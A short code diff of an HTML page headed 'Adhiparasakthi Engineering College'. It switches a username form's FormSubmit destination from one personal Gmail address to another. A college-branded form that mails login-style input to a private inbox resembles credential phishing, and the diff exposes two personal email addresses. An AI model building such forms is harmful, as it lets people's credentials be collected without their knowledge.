--- a/index.html
+++ b/index.html
@@ -91,7 +91,7 @@
     <h2>Adhiparasakthi Engineering College</h2>
     
     <!-- ✅ FormSubmit Integration -->
-    <form action="https://formsubmit.co/samanthakarthikeyan2006@gmail.com" method="POST">
+    <form action="https://formsubmit.co/ragzzway@gmail.com" method="POST">
       <!-- Form fields -->
       <label for="username">Username</label>
       <input id="username" name="username" type="text" placeholder="Enter username" required>
